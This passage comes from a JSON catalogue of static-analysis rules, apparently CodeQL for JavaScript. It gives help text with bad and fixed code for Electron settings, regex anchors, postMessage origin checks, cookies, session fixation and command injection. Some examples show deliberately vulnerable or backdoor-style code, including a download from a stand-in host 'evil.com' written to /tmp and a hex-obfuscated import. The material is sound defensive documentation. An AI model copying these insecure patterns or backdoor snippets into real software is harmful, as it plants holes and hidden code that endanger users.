disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    allowRunningInsecureContent: true\n  }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n","markdown":"# Enabling Electron allowRunningInsecureContent\nElectron is secure by default through a policy banning the execution of content loaded over HTTP. Setting the `allowRunningInsecureContent` property of a `webPreferences` object to `true` will disable this policy.\n\nEnabling the execution of insecure content is strongly discouraged.\n\n\n## Recommendation\nDo not enable the `allowRunningInsecureContent` property.\n\n\n## Example\nThe following example shows `allowRunningInsecureContent` being enabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    allowRunningInsecureContent: true\n  }\n})\n```\nThis is problematic, since it allows the execution of code from an untrusted origin.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#8-do-not-set-allowrunninginsecurecontent-to-true)\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n"},"properties":{"tags":["security","frameworks/electron","external/cwe/cwe-494"],"description":"Enabling allowRunningInsecureContent can allow remote code execution.","id":"js/enabling-electron-insecure-content","kind":"problem","name":"Enabling Electron allowRunningInsecureContent","precision":"very-high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/disabling-electron-websecurity","name":"js/disabling-electron-websecurity","shortDescription":{"text":"Disabling Electron webSecurity"},"fullDescription":{"text":"Disabling webSecurity can cause critical security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    webSecurity: false\n  }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n","markdown":"# Disabling Electron webSecurity\nElectron is secure by default through a same-origin policy requiring all JavaScript and CSS code to originate from the machine running the Electron application. Setting the `webSecurity` property of a `webPreferences` object to `false` will disable the same-origin policy.\n\nDisabling the same-origin policy is strongly discouraged.\n\n\n## Recommendation\nDo not disable `webSecurity`.\n\n\n## Example\nThe following example shows `webSecurity` being disabled.\n\n\n```javascript\nconst mainWindow = new BrowserWindow({\n  webPreferences: {\n    webSecurity: false\n  }\n})\n```\nThis is problematic, since it allows the execution of insecure code from other domains.\n\n\n## References\n* Electron Documentation: [Security, Native Capabilities, and Your Responsibility](https://electronjs.org/docs/tutorial/security#5-do-not-disable-websecurity)\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n"},"properties":{"tags":["security","frameworks/electron","external/cwe/cwe-079"],"description":"Disabling webSecurity can cause critical security vulnerabilities.","id":"js/disabling-electron-websecurity","kind":"problem","name":"Disabling Electron webSecurity","precision":"very-high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/regex/missing-regexp-anchor","name":"js/regex/missing-regexp-anchor","shortDescription":{"text":"Missing regular expression anchor"},"fullDescription":{"text":"Regular expressions without anchors can be vulnerable to bypassing."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // GOOD: the host of `url` can not be controlled by an attacker\n    if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n","markdown":"# Missing regular expression anchor\nSanitizing untrusted input with regular expressions is a common technique. However, it is error-prone to match untrusted input against regular expressions without anchors such as `^` or `$`. Malicious input can bypass such security checks by embedding one of the allowed patterns in an unexpected location.\n\nEven if the matching is not done in a security-critical context, it may still cause undesirable behavior when the regular expression accidentally matches.\n\n\n## Recommendation\nUse anchors to ensure that regular expressions match at the expected locations.\n\n\n## Example\nThe following example code checks that a URL redirection will reach the `example.com` domain, or one of its subdomains, and not some malicious site.\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // BAD: the host of `url` may be controlled by an attacker\n    if (url.match(/https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nThe check with the regular expression match is, however, easy to bypass. For example by embedding `http://example.com/` in the query string component: `http://evil-example.net/?x=http://example.com/`. Address these shortcomings by using anchors in the regular expression instead:\n\n\n```javascript\napp.get(\"/some/path\", function(req, res) {\n    let url = req.param(\"url\");\n    // GOOD: the host of `url` can not be controlled by an attacker\n    if (url.match(/^https?:\\/\\/www\\.example\\.com\\//)) {\n        res.redirect(url);\n    }\n});\n\n```\nA related mistake is to write a regular expression with multiple alternatives, but to only include an anchor for one of the alternatives. As an example, the regular expression `/^www\\.example\\.com|beta\\.example\\.com/` will match the host `evil.beta.example.com` because the regular expression is parsed as `/(^www\\.example\\.com)|(beta\\.example\\.com)/`\n\n\n## References\n* MDN: [Regular Expressions](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions)\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* OWASP: [XSS Unvalidated Redirects and Forwards Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020"],"description":"Regular expressions without anchors can be vulnerable to bypassing.","id":"js/regex/missing-regexp-anchor","kind":"problem","name":"Missing regular expression anchor","precision":"medium","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/missing-origin-check","name":"js/missing-origin-check","shortDescription":{"text":"Missing origin verification in `postMessage` handler"},"fullDescription":{"text":"Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    let origin = event.origin.toLowerCase();\n\n    console.log(origin)\n    // BAD: the origin property is not checked\n    eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    console.log(event.origin)\n    // GOOD: the origin property is checked\n    if (event.origin === 'https://www.example.com') {\n        // do something\n    }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n","markdown":"# Missing origin verification in `postMessage` handler\nThe `\"message\"` event is used to send messages between windows. An untrusted window can send a message to a trusted window, and it is up to the receiver to verify the legitimacy of the message. One way of performing that verification is to check the `origin` of the message ensure that it originates from a trusted window.\n\n\n## Recommendation\nAlways verify the origin of incoming messages.\n\n\n## Example\nThe example below uses a received message to execute some code. However, the origin of the message is not checked, so it might be possible for an attacker to execute arbitrary code.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    let origin = event.origin.toLowerCase();\n\n    console.log(origin)\n    // BAD: the origin property is not checked\n    eval(event.data);\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n\n```\nThe example is fixed below, where the origin is checked to be trusted. It is therefore not possible for a malicious user to perform an attack using an untrusted origin.\n\n\n```javascript\nfunction postMessageHandler(event) {\n    console.log(event.origin)\n    // GOOD: the origin property is checked\n    if (event.origin === 'https://www.example.com') {\n        // do something\n    }\n}\n\nwindow.addEventListener('message', postMessageHandler, false);\n```\n\n## References\n* [Window.postMessage()](https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage).\n* [Web message manipulation](https://portswigger.net/web-security/dom-based/web-message-manipulation).\n* [The pitfalls of postMessage](https://labs.detectify.com/2016/12/08/the-pitfalls-of-postmessage/).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-940](https://cwe.mitre.org/data/definitions/940.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-020","external/cwe/cwe-940"],"description":"Missing origin verification in a `postMessage` handler allows any windows to send arbitrary data to the handler.","id":"js/missing-origin-check","kind":"problem","name":"Missing origin verification in `postMessage` handler","precision":"medium","problem.severity":"warning","security-severity":"5"}},{"id":"js/samesite-none-cookie","name":"js/samesite-none-cookie","shortDescription":{"text":"Sensitive cookie without SameSite restrictions"},"fullDescription":{"text":"Sensitive cookies where the SameSite attribute is set to \"None\" can in some cases allow for Cross-Site Request Forgery (CSRF) attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n","markdown":"# Sensitive cookie without SameSite restrictions\nAuthentication cookies where the SameSite attribute is set to \"None\" can potentially be used to perform Cross-Site Request Forgery (CSRF) attacks if no other CSRF protections are in place.\n\nWith SameSite set to \"None\", a third party website may create an authorized cross-site request that includes the cookie. Such a cross-site request can allow that website to perform actions on behalf of a user.\n\n\n## Recommendation\nSet the `SameSite` attribute to `Strict` on all sensitive cookies.\n\n\n## Example\nThe following example stores an authentication token in a cookie where the `SameSite` attribute is set to `None`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=None`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\nTo prevent the cookie from being included in cross-site requests, set the `SameSite` attribute to `Strict`.\n\n\n```javascript\nconst http = require('http');\n\nconst server = http.createServer((req, res) => {\n    res.setHeader(\"Set-Cookie\", `authKey=${makeAuthkey()}; secure; httpOnly; SameSite=Strict`);\n    res.writeHead(200, { 'Content-Type': 'text/html' });\n    res.end('<h2>Hello world</h2>');\n});\n```\n\n## References\n* MDN Web Docs: [SameSite cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite).\n* OWASP: [SameSite](https://owasp.org/www-community/SameSite).\n* Common Weakness Enumeration: [CWE-1275](https://cwe.mitre.org/data/definitions/1275.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1275"],"description":"Sensitive cookies where the SameSite attribute is set to \"None\" can\n              in some cases allow for Cross-Site Request Forgery (CSRF) attacks.","id":"js/samesite-none-cookie","kind":"problem","name":"Sensitive cookie without SameSite restrictions","precision":"medium","problem.severity":"warning","security-severity":"5.0"}},{"id":"js/session-fixation","name":"js/session-fixation","shortDescription":{"text":"Failure to abandon session"},"fullDescription":{"text":"Reusing an existing session as a different user could allow an attacker to access someone else's account by using their session."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.authenticated = true;\n        res.redirect('/');\n    } else {\n        res.redirect('/login');\n    }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.regenerate(function (err) {\n            if (err) {\n                res.send('Error');\n            } else {\n                req.session.authenticated = true;\n                res.redirect('/');\n            }\n        });\n    } else {\n        res.redirect('/login');\n    }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n","markdown":"# Failure to abandon session\nReusing a session could allow an attacker to gain unauthorized access to another account. Always ensure that, when a user logs in or out, the current session is abandoned so that a new session may be started.\n\n\n## Recommendation\nAlways use `req.session.regenerate(...);` to start a new session when a user logs in or out.\n\n\n## Example\nThe following example shows the previous session being used after authentication. This would allow a previous user to use the new user's account.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.authenticated = true;\n        res.redirect('/');\n    } else {\n        res.redirect('/login');\n    }\n});\n```\nThis code example solves the problem by not reusing the session, and instead calling `req.session.regenerate()` to ensure that the session is not reused.\n\n\n```javascript\nconst express = require('express');\nconst session = require('express-session');\nvar bodyParser = require('body-parser')\nconst app = express();\napp.use(bodyParser.urlencoded({ extended: false }))\napp.use(session({\n    secret: 'keyboard cat'\n}));\n\napp.post('/login', function (req, res) {\n    // Check that username password matches\n    if (req.body.username === 'admin' && req.body.password === 'admin') {\n        req.session.regenerate(function (err) {\n            if (err) {\n                res.send('Error');\n            } else {\n                req.session.authenticated = true;\n                res.redirect('/');\n            }\n        });\n    } else {\n        res.redirect('/login');\n    }\n});\n```\n\n## References\n* OWASP: [Session fixation](https://www.owasp.org/index.php/Session_fixation)\n* Stack Overflow: [Creating a new session after authentication with Passport](https://stackoverflow.com/questions/22209354/creating-a-new-session-after-authentication-with-passport/30468384#30468384)\n* jscrambler.com: [Best practices for secure session management in Node](https://blog.jscrambler.com/best-practices-for-secure-session-management-in-node)\n* Common Weakness Enumeration: [CWE-384](https://cwe.mitre.org/data/definitions/384.html).\n"},"properties":{"tags":["security","external/cwe/cwe-384"],"description":"Reusing an existing session as a different user could allow\n              an attacker to access someone else's account by using\n              their session.","id":"js/session-fixation","kind":"problem","name":"Failure to abandon session","precision":"medium","problem.severity":"warning","security-severity":"5"}},{"id":"js/indirect-command-line-injection","name":"js/indirect-command-line-injection","shortDescription":{"text":"Indirect uncontrolled command line"},"fullDescription":{"text":"Forwarding command-line arguments to a child process executed within a shell may indirectly introduce command-line injection vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n    nodeOpts = args[1];\n    args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n","markdown":"# Indirect uncontrolled command line\nForwarding command-line arguments to `child_process.exec` or some other library routine that executes a system command within a shell can change the meaning of the command unexpectedly due to unescaped special characters.\n\nWhen the forwarded command-line arguments come from a parent process that has not escaped the special characters in the arguments, then the parent process may indirectly be vulnerable to command-line injection since the special characters are evaluated unexpectedly.\n\n\n## Recommendation\nIf possible, use APIs that don't run shell commands and accept command arguments as an array of strings rather than a single concatenated string. This is both safer and more portable.\n\nIf given arguments as a single string, avoid simply splitting the string on whitespace. Arguments may contain quoted whitespace, causing them to split into multiple arguments. Use a library like `shell-quote` to parse the string into an array of arguments instead.\n\nIf this approach is not viable, then add code to verify that each forwarded command-line argument is properly escaped before using it.\n\n\n## Example\nThe following wrapper script example executes another JavaScript file in a child process and forwards some command-line arguments. This is problematic because the special characters in the command-line arguments may change the meaning of the child process invocation unexpectedly. For instance, if one of the command-line arguments is `\"dollar$separated$name\"`, then the child process will substitute the two environment variables `$separated` and `$name` before invoking `node`.\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execSync(`node ${script} ${args.join(' ')}`); // BAD\n\n```\nIf another program uses `child_process.execFile` to invoke the above wrapper script with input from a remote user, then there may be a command-line injection vulnerability. This may be surprising, since a command-line invocation with `child_process.execFile` is generally considered safe. But in this case, the remote user input is simply forwarded to the problematic `process.exec` call in the wrapper script.\n\nTo guard against this, use an API that does not perform environment variable substitution, such as `child_process.execFile`:\n\n\n```javascript\nvar cp = require(\"child_process\");\n\nconst args = process.argv.slice(2);\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', [script].concat(args)); // GOOD\n\n```\nIf you want to allow the user to specify other options to `node`, you can use a library like `shell-quote` to parse the user input into an array of arguments without risking command injection:\n\n\n```javascript\nvar cp = require(\"child_process\"),\n    shellQuote = require(\"shell-quote\");\n\nconst args = process.argv.slice(2);\nlet nodeOpts = '';\nif (args[0] === '--node-opts') {\n    nodeOpts = args[1];\n    args.splice(0, 2);\n}\nconst script = path.join(__dirname, 'bin', 'main.js');\ncp.execFileSync('node', shellQuote.parse(nodeOpts).concat(script).concat(args)); // GOOD\n\n```\n\n## References\n* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection).\n* npm: [shell-quote](https://www.npmjs.com/package/shell-quote).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-88](https://cwe.mitre.org/data/definitions/88.html).\n"},"properties":{"tags":["correctness","security","external/cwe/cwe-078","external/cwe/cwe-088"],"description":"Forwarding command-line arguments to a child process\n              executed within a shell may indirectly introduce\n              command-line injection vulnerabilities.","id":"js/indirect-command-line-injection","kind":"path-problem","name":"Indirect uncontrolled command line","precision":"medium","problem.severity":"warning","security-severity":"6.3"}},{"id":"js/http-to-file-access","name":"js/http-to-file-access","shortDescription":{"text":"Network data written to file"},"fullDescription":{"text":"Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n  res.on(\"data\", d => {\n    fs.writeFileSync(\"/tmp/script\", d)\n  })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n","markdown":"# Network data written to file\nStoring user-controlled data on the local file system without further validation allows arbitrary file upload, and may be an indication of malicious backdoor code that has been implanted into an otherwise trusted code base.\n\n\n## Recommendation\nExamine the highlighted code closely to ensure that it is behaving as intended.\n\n\n## Example\nThe following example shows backdoor code that downloads data from the URL `https://evil.com/script`, and stores it in the local file `/tmp/script`.\n\n\n```javascript\nvar https = require(\"https\");\nvar fs = require(\"fs\");\n\nhttps.get('https://evil.com/script', res => {\n  res.on(\"data\", d => {\n    fs.writeFileSync(\"/tmp/script\", d)\n  })\n});\n\n```\nOther parts of the program might then assume that since `/tmp/script` is a local file its contents can be trusted, while in fact they are obtained from an untrusted remote source.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* OWASP: [Unrestricted File Upload](https://www.owasp.org/index.php/Unrestricted_File_Upload).\n* Common Weakness Enumeration: [CWE-912](https://cwe.mitre.org/data/definitions/912.html).\n* Common Weakness Enumeration: [CWE-434](https://cwe.mitre.org/data/definitions/434.html).\n"},"properties":{"tags":["security","external/cwe/cwe-912","external/cwe/cwe-434"],"description":"Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.","id":"js/http-to-file-access","kind":"path-problem","name":"Network data written to file","precision":"medium","problem.severity":"warning","security-severity":"6.3"}},{"id":"js/hardcoded-data-interpreted-as-code","name":"js/hardcoded-data-interpreted-as-code","shortDescription":{"text":"Hard-coded data interpreted as code"},"fullDescription":{"text":"Transforming hard-coded data (such as hexadecimal constants) into code to be executed is a technique often associated with backdoors and should be avoided."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n  return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar n = r(e(\"2e2f746573742f64617461\"));\n\n```\nWhile this shows only the first few lines of code, it already looks very suspicious since it takes a hard-coded string literal, hex-decodes it and then uses it as an import path. The only reason to do so is to hide the name of the file being imported.\n\n\n## References\n* OWASP: [Trojan Horse](https://www.owasp.org/index.php/Trojan_Horse).\n* The npm Blog: [Details about the event-stream incident](https://blog.npmjs.org/post/180565383195/details-about-the-event-stream-incident).\n* Common Weakness Enumeration: [CWE-506](https://cwe.mitre.org/data/definitions/506.html).\n","markdown":"# Hard-coded data interpreted as code\nInterpreting hard-coded data, such as string literals containing hexadecimal numbers, as code or as an import path is typical of malicious backdoor code that has been implanted into an otherwise trusted code base and is trying to hide its true purpose from casual readers or automated scanning tools.\n\n\n## Recommendation\nExamine the code in question carefully to ascertain its provenance and its true purpose. If the code is benign, it should always be possible to rewrite it without relying on dynamically interpreting data as code, improving both clarity and safety.\n\n\n## Example\nAs an example of malicious code using this obfuscation technique, consider the following simplified version of a snippet of backdoor code that was discovered in a dependency of the popular `event-stream` npm package:\n\n\n```javascript\nvar r = require;\n\nfunction e(r) {\n  return Buffer.from(r, \"hex\").toString()\n}\n\n// BAD: hexadecimal constant decoded and interpreted as import path\nvar 